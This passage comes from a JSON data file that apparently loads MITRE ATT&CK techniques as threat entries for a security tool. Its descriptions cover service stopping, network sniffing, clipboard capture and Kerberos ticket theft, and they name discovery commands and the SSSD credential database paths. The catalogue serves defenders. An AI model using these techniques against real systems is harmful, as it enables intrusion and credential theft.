encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)\nhttps://attack.mitre.org/techniques/T1600\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1489 - Service Stop", - "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)\nhttps://attack.mitre.org/techniques/T1489\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1652 - Device Driver Discovery", - "description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)\nhttps://attack.mitre.org/techniques/T1652\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1564 - Hide Artifacts", - "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)\nhttps://attack.mitre.org/techniques/T1564\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1080 - Taint Shared Content", - "description": "Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.\nhttps://attack.mitre.org/techniques/T1080\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1137 - Office Application Startup", - "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)\nhttps://attack.mitre.org/techniques/T1137\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1119 - Automated Collection", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.\nhttps://attack.mitre.org/techniques/T1119\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1115 - Clipboard Data", - "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users\u2019 clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)\nhttps://attack.mitre.org/techniques/T1115\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1007 - System Service Discovery", - "description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.\n\nAdversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nhttps://attack.mitre.org/techniques/T1007\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1040 - Network Sniffing", - "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)\nhttps://attack.mitre.org/techniques/T1040\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1530 - Data from Cloud Storage", - "description": "Adversaries may access data from improperly secured cloud storage.\n\nMany cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. \n\nIn other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011)\n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.\nhttps://attack.mitre.org/techniques/T1530\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1135 - Network Share Discovery", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.\nhttps://attack.mitre.org/techniques/T1135\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1120 - Peripheral Device Discovery", - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.\nhttps://attack.mitre.org/techniques/T1120\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1082 - System Information Discovery", - "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\nhttps://attack.mitre.org/techniques/T1082\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1071 - Application Layer Protocol", - "description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.\nhttps://attack.mitre.org/techniques/T1071\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1053 - Scheduled Task/Job", - "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)\nhttps://attack.mitre.org/techniques/T1053\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1176 - Browser Extensions", - "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)\nhttps://attack.mitre.org/techniques/T1176\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1106 - Native API", - "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).\nhttps://attack.mitre.org/techniques/T1106\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1202 - Indirect Command Execution", - "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.\nhttps://attack.mitre.org/techniques/T1202\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1091 - Replication Through Removable Media", - "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).\nhttps://attack.mitre.org/techniques/T1091\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1005 - Data from Local System", - "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\nhttps://attack.mitre.org/techniques/T1005\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1140 - Deobfuscate/Decode Files or Information", - "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)\nhttps://attack.mitre.org/techniques/T1140\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1562 - Impair Defenses", - "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.\nhttps://attack.mitre.org/techniques/T1562\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1195 - Supply Chain Compromise", - "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)\nhttps://attack.mitre.org/techniques/T1195\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1190 - Exploit Public-Facing Application", - "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)\nhttps://attack.mitre.org/techniques/T1190\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1558 - Steal or Forge Kerberos Tickets", - "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as \u201crealms\u201d, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\nhttps://attack.mitre.org/techniques/T1558\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1555 - Credentials from Password Stores", - "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.\nhttps://attack.mitre.org/techniques/T1555\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1567 - Exfiltration Over Web Service", - "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.\nhttps://attack.mitre.org/techniques/T1567\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1219 - Remote Access Software", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.(Citation: Symantec Living off the Land)\n\nRemote access tools may be installed and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Installation of many remote access tools may also include persistence (ex: the tool's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)\nhttps://attack.mitre.org/techniques/T1219\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1036 - Masquerading", - "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)\nhttps://attack.mitre.org/techniques/T1036\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1552 - Unsecured Credentials", - "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).\nhttps://attack.mitre.org/techniques/T1552\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1055 - Process Injection", - "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in 